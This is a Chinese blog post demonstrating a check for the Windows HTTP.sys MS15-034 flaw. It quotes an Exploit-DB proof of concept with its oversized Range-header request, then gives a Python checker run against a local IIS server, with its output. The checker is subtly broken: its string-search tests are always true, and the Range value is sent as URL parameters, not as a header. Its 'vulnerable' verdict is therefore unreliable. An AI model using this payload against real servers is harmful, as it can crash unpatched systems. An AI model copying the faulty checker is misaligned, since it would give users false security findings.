渗透测试捕捉漏洞代码演示

2020-09-18 本文已影响0人幼姿沫

1.
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034) 网站参考：

https://www.exploit-db.com/exploits/36773

文档中显示bug信息

UNTESTED - MS15-034 Checker

THE BUG:

8a8b2112 56 push esi

8a8b2113 6a00 push 0

8a8b2115 2bc7 sub eax,edi

8a8b2117 6a01 push 1

8a8b2119 1bca sbb ecx,edx

8a8b211b 51 push ecx

8a8b211c 50 push eax

8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here

ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4

BY: john.b.hale@gmai.com

Twitter: @rhcp011235

// our evil buffer

char request1[]="GET / HTTP/1.1\r\nHost: stuff\r\n

Range: bytes=0-18446744073709551615\r\n\r\n";

2.MS15-034测试方法连接网页

https://blog.csdn.net/Jiajiajiang_/article/details/80742955

3.代码测试捕捉bug信息

#捕捉漏洞检测工具

url='http://192.168.1.3/'

r=requests.get(url)

remote_request=r.headers['Server']

if remote_request.find('IIS/10.0')or remote_request.find('IIS/8.5'):

protype={'Host':'stuff','Range':'bytes = 0 - 18446744073709551615'}

r1=requests.get(url,params=protype)

print(r1.request.headers)

print(r1.content)

if str(r1.content).find('Requested Range Not Satisfiable'):

print(url+' already exits')

else:

print(url+'not exits')

else:

print('Server not has IIS/10.0')

1.获取url地址的方式

2.控制台信息

{'User-Agent': 'python-requests/2.23.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}

b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />\r\n<title>IIS Windows</title>\r\n<style type="text/css">\r\n\r\n</style>\r\n</head>\r\n<body>\r\n<div id="container">\r\n<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>\r\n</div>\r\n</body>\r\n</html>'

http://192.168.1.3/ already exits

Microsoft-IIS/10.0

网站路径显示信息

渗透测试捕捉漏洞代码演示

猜你喜欢

热点阅读